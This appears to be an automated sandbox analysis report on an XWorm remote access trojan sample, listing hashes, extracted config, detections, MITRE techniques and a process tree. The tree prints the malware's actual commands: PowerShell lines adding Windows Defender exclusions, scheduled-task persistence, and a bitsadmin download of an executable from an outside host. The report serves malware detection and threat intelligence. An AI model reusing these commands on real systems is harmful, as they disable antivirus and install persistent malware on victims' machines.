xworm | 71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96

Analysis

max time kernel
147s
max time network
148s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
07/03/2025, 22:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PhantomCrypter.exe
Size

5.2MB
MD5

e877adfe74b6bd2ad9b9f5c73f839152
SHA1

ff73461cd1fc5d9755d8dfa135ed3f6401989d00
SHA256

71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96
SHA512

7c0828a3e966dee6e93e8c6797068c1d4b27a9c1b88249381db6028d7ec18b282560a9e215da2f2c9841307c0f1732fea47983107fd606b850386e993f7431d1
SSDEEP

98304:KUJgH4K+NsPeD9k/OYU2HkSBEIHFP2gH4KdBwgH/fkEihw:KUcT+NsPOkeLAVFXTdBwgH/Mr

Score

10^/10

xworm discovery dropper execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

fSptE7osVO19YSsZ

Attributes

Install_directory
%AppData%
install_file
msedge.exe
pastebin_url
https://pastebin.com/raw/eZa6J63T

aes.plain

Signatures

Detect Xworm Payload 11 IoCs

resource	yara_rule
behavioral1/files/0x000e00000001418b-5.dat	family_xworm
behavioral1/memory/2124-7-0x00000000011A0000-0x00000000011CE000-memory.dmp	family_xworm
behavioral1/files/0x0009000000015ce8-18.dat	family_xworm
behavioral1/files/0x0007000000015e05-25.dat	family_xworm
behavioral1/memory/2544-29-0x0000000000020000-0x000000000004E000-memory.dmp	family_xworm
behavioral1/memory/2752-28-0x0000000000830000-0x000000000085C000-memory.dmp	family_xworm
behavioral1/files/0x0007000000015e16-33.dat	family_xworm
behavioral1/memory/2820-41-0x00000000013E0000-0x0000000001408000-memory.dmp	family_xworm
behavioral1/memory/900-160-0x0000000001310000-0x0000000001338000-memory.dmp	family_xworm
behavioral1/memory/1176-164-0x00000000012A0000-0x00000000012CE000-memory.dmp	family_xworm
behavioral1/memory/1884-171-0x0000000000120000-0x0000000000148000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2300	powershell.exe
2720	powershell.exe
700	powershell.exe
2572	powershell.exe
2848	powershell.exe
264	powershell.exe
2244	powershell.exe
2856	powershell.exe
1632	powershell.exe
988	powershell.exe
2796	powershell.exe
2520	powershell.exe
1112	powershell.exe
1312	powershell.exe
2248	powershell.exe
2640	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
1888	bitsadmin.exe

Drops startup file 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 10 IoCs

pid	Process
2124	msedge.exe
2628	PhantomCrypters.exe
2752	Chrome Update.exe
2544	msedge.exe
2820	OneDrive.exe
2704	TOPHERC.exe
900	OneDrive.exe
1176	msedge.exe
1884	OneDrive.exe
2304	msedge.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe"	Chrome Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe"	OneDrive.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
14	pastebin.com
10	pastebin.com
11	pastebin.com
12	pastebin.com
13	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TOPHERC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2424	schtasks.exe
1012	schtasks.exe
2980	schtasks.exe
2288	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1112	powershell.exe
2848	powershell.exe
2300	powershell.exe
264	powershell.exe
2720	powershell.exe
988	powershell.exe
1312	powershell.exe
1632	powershell.exe
700	powershell.exe
2244	powershell.exe
2248	powershell.exe
2796	powershell.exe
2572	powershell.exe
2640	powershell.exe
2520	powershell.exe
2856	powershell.exe
2124	msedge.exe
2752	Chrome Update.exe
2544	msedge.exe
2820	OneDrive.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	2124	msedge.exe
Token: SeDebugPrivilege	2544	msedge.exe
Token: SeDebugPrivilege	2752	Chrome Update.exe
Token: SeDebugPrivilege	2820	OneDrive.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	264	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2124	msedge.exe
Token: SeDebugPrivilege	2752	Chrome Update.exe
Token: SeDebugPrivilege	2544	msedge.exe
Token: SeDebugPrivilege	2820	OneDrive.exe
Token: SeDebugPrivilege	900	OneDrive.exe
Token: SeDebugPrivilege	1176	msedge.exe
Token: SeDebugPrivilege	1884	OneDrive.exe
Token: SeDebugPrivilege	2304	msedge.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2704	TOPHERC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2124	msedge.exe
2752	Chrome Update.exe
2544	msedge.exe
2820	OneDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2124	2108	PhantomCrypter.exe	31
PID 2108 wrote to memory of 2124	2108	PhantomCrypter.exe	31
PID 2108 wrote to memory of 2124	2108	PhantomCrypter.exe	31
PID 2108 wrote to memory of 2628	2108	PhantomCrypter.exe	32
PID 2108 wrote to memory of 2628	2108	PhantomCrypter.exe	32
PID 2108 wrote to memory of 2628	2108	PhantomCrypter.exe	32
PID 2628 wrote to memory of 2752	2628	PhantomCrypters.exe	33
PID 2628 wrote to memory of 2752	2628	PhantomCrypters.exe	33
PID 2628 wrote to memory of 2752	2628	PhantomCrypters.exe	33
PID 2628 wrote to memory of 2924	2628	PhantomCrypters.exe	34
PID 2628 wrote to memory of 2924	2628	PhantomCrypters.exe	34
PID 2628 wrote to memory of 2924	2628	PhantomCrypters.exe	34
PID 2628 wrote to memory of 2924	2628	PhantomCrypters.exe	34
PID 2628 wrote to memory of 2544	2628	PhantomCrypters.exe	35
PID 2628 wrote to memory of 2544	2628	PhantomCrypters.exe	35
PID 2628 wrote to memory of 2544	2628	PhantomCrypters.exe	35
PID 2628 wrote to memory of 2820	2628	PhantomCrypters.exe	36
PID 2628 wrote to memory of 2820	2628	PhantomCrypters.exe	36
PID 2628 wrote to memory of 2820	2628	PhantomCrypters.exe	36
PID 2628 wrote to memory of 2704	2628	PhantomCrypters.exe	37
PID 2628 wrote to memory of 2704	2628	PhantomCrypters.exe	37
PID 2628 wrote to memory of 2704	2628	PhantomCrypters.exe	37
PID 2628 wrote to memory of 2704	2628	PhantomCrypters.exe	37
PID 2924 wrote to memory of 1888	2924	mshta.exe	38
PID 2924 wrote to memory of 1888	2924	mshta.exe	38
PID 2924 wrote to memory of 1888	2924	mshta.exe	38
PID 2924 wrote to memory of 1888	2924	mshta.exe	38
PID 2124 wrote to memory of 1112	2124	msedge.exe	40
PID 2124 wrote to memory of 1112	2124	msedge.exe	40
PID 2124 wrote to memory of 1112	2124	msedge.exe	40
PID 2544 wrote to memory of 2848	2544	msedge.exe	42
PID 2544 wrote to memory of 2848	2544	msedge.exe	42
PID 2544 wrote to memory of 2848	2544	msedge.exe	42
PID 2752 wrote to memory of 2300	2752	Chrome Update.exe	44
PID 2752 wrote to memory of 2300	2752	Chrome Update.exe	44
PID 2752 wrote to memory of 2300	2752	Chrome Update.exe	44
PID 2124 wrote to memory of 264	2124	msedge.exe	46
PID 2124 wrote to memory of 264	2124	msedge.exe	46
PID 2124 wrote to memory of 264	2124	msedge.exe	46
PID 2820 wrote to memory of 2720	2820	OneDrive.exe	48
PID 2820 wrote to memory of 2720	2820	OneDrive.exe	48
PID 2820 wrote to memory of 2720	2820	OneDrive.exe	48
PID 2544 wrote to memory of 1312	2544	msedge.exe	50
PID 2544 wrote to memory of 1312	2544	msedge.exe	50
PID 2544 wrote to memory of 1312	2544	msedge.exe	50
PID 2752 wrote to memory of 1632	2752	Chrome Update.exe	52
PID 2752 wrote to memory of 1632	2752	Chrome Update.exe	52
PID 2752 wrote to memory of 1632	2752	Chrome Update.exe	52
PID 2124 wrote to memory of 988	2124	msedge.exe	53
PID 2124 wrote to memory of 988	2124	msedge.exe	53
PID 2124 wrote to memory of 988	2124	msedge.exe	53
PID 2820 wrote to memory of 700	2820	OneDrive.exe	56
PID 2820 wrote to memory of 700	2820	OneDrive.exe	56
PID 2820 wrote to memory of 700	2820	OneDrive.exe	56
PID 2544 wrote to memory of 2244	2544	msedge.exe	58
PID 2544 wrote to memory of 2244	2544	msedge.exe	58
PID 2544 wrote to memory of 2244	2544	msedge.exe	58
PID 2124 wrote to memory of 2248	2124	msedge.exe	60
PID 2124 wrote to memory of 2248	2124	msedge.exe	60
PID 2124 wrote to memory of 2248	2124	msedge.exe	60
PID 2752 wrote to memory of 2796	2752	Chrome Update.exe	62
PID 2752 wrote to memory of 2796	2752	Chrome Update.exe	62
PID 2752 wrote to memory of 2796	2752	Chrome Update.exe	62
PID 2820 wrote to memory of 2572	2820	OneDrive.exe	64

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Users\Admin\AppData\Local\Temp\msedge.exe
  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2424
- C:\Users\Admin\AppData\Local\Temp\PhantomCrypters.exe
  "C:\Users\Admin\AppData\Local\Temp\PhantomCrypters.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Users\Admin\AppData\Roaming\Chrome Update.exe
    "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2520
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1012
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:1888
- - C:\Users\Admin\AppData\Roaming\msedge.exe
    "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1312
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2640
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2980
- - C:\Users\Admin\AppData\Roaming\OneDrive.exe
    "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2856
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2288
- - C:\Users\Admin\AppData\Roaming\TOPHERC.exe
    "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:2704

C:\Windows\system32\taskeng.exe
taskeng.exe {75BCDA69-D351-4E50-859B-7EB38D3B3C57} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
1⤵
PID:2132
- C:\ProgramData\OneDrive.exe
  C:\ProgramData\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:900
- C:\Users\Admin\AppData\Local\msedge.exe
  C:\Users\Admin\AppData\Local\msedge.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1176
- C:\ProgramData\OneDrive.exe
  C:\ProgramData\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1884
- C:\Users\Admin\AppData\Local\msedge.exe
  C:\Users\Admin\AppData\Local\msedge.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PhantomCrypters.exe

Filesize
5.0MB

MD5
d4d28f2c6fd9af9ee5a3be30f9ab913b

SHA1
be4264bceaff957ff799b73ebc2479f0fc794815

SHA256
c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

SHA512
7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

Download Submit
C:\Users\Admin\AppData\Local\Temp\msedge.exe

Filesize
165KB

MD5
8c92b315d88907a31ad9eaa934a60660

SHA1
89c26c8a1f5b2db85e628a6526c9431e7febe5f8

SHA256
bea75b57f940b13d5bfcb05a0c3ae1def9d2d25f6c3115fc7b2bf85232175672

SHA512
b294fd15ac63bbd7cfd444c9df5a03c7bce8bc98d2b2d2011e5290638fba689ff083260ed60688cc4b0a0a59299dda0b1cc09ba8f63daf92efbeeaed604ebfc2

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome Update.exe

Filesize
152KB

MD5
16cdd301591c6af35a03cd18caee2e59

SHA1
92c6575b57eac309c8664d4ac76d87f2906e8ef3

SHA256
11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

SHA512
a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

Download Submit
C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

Filesize
844B

MD5
3f8a283abe6fe28a7d217c8105041426

SHA1
0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

SHA256
333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

SHA512
bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
cb158b225aee2ab7ed70006b303b95ab

SHA1
fb1d590ef4607f0bca22662ad84bc8fea22b74b9

SHA256
be8653d73e7d73966446fc759835a057f71a8d9d9e2c31e020c20af6b7373c73

SHA512
43ec8dad4687b4628ffe8d2461e799dafad42f490ce4d11357d560c8204ed76b5684c6d3012ff6043ed64d6939a116da27683adbea0310f4a6ddbcfc635f7875

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Filesize
687B

MD5
c2fc61cee9d69110cd55411c908794b5

SHA1
87b4eb7918ec99cd778d8b86e2fb5fa421ff5f6e

SHA256
9da7bec06eeb49ce63fa831ce6fe05b3e99cfec1fa03b4f4b1f751059ebc798d

SHA512
f6d9d63815c30fcf9639dcb951bcd33156bd06c57a70af03a0be29863f674c05d87819a760c249363fbd9cefe231880772d4179d70c0d25467c4b1408391d4e1

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
140KB

MD5
a1cd6f4a3a37ed83515aa4752f98eb1d

SHA1
7f787c8d72787d8d130b4788b006b799167d1802

SHA256
5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

SHA512
9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

Download Submit
C:\Users\Admin\AppData\Roaming\TOPHERC.exe

Filesize
4.2MB

MD5
79f2fd33a188ff47216b4f4dd4552582

SHA1
16e40e0a1fed903fec20cd6cd600e3a2548881ad

SHA256
cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

SHA512
caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
166KB

MD5
aee20d80f94ae0885bb2cabadb78efc9

SHA1
1e82eba032fcb0b89e1fdf937a79133a5057d0a1

SHA256
498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

SHA512
3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

Download Submit
memory/900-160-0x0000000001310000-0x0000000001338000-memory.dmp

Filesize
160KB

Download
memory/1112-48-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/1112-47-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/1176-164-0x00000000012A0000-0x00000000012CE000-memory.dmp

Filesize
184KB

Download
memory/1884-171-0x0000000000120000-0x0000000000148000-memory.dmp

Filesize
160KB

Download
memory/2108-1-0x0000000001260000-0x0000000001796000-memory.dmp

Filesize
5.2MB

Download
memory/2108-0-0x000007FEF6063000-0x000007FEF6064000-memory.dmp

Filesize
4KB

Download
memory/2124-156-0x000007FEF6060000-0x000007FEF6A4C000-memory.dmp

Filesize
9.9MB

Download
memory/2124-10-0x000007FEF6060000-0x000007FEF6A4C000-memory.dmp

Filesize
9.9MB

Download
memory/2124-155-0x000007FEF6060000-0x000007FEF6A4C000-memory.dmp

Filesize
9.9MB

Download
memory/2124-7-0x00000000011A0000-0x00000000011CE000-memory.dmp

Filesize
184KB

Download
memory/2124-145-0x000007FEF6060000-0x000007FEF6A4C000-memory.dmp

Filesize
9.9MB

Download
memory/2544-29-0x0000000000020000-0x000000000004E000-memory.dmp

Filesize
184KB

Download
memory/2628-14-0x0000000000800000-0x0000000000D08000-memory.dmp

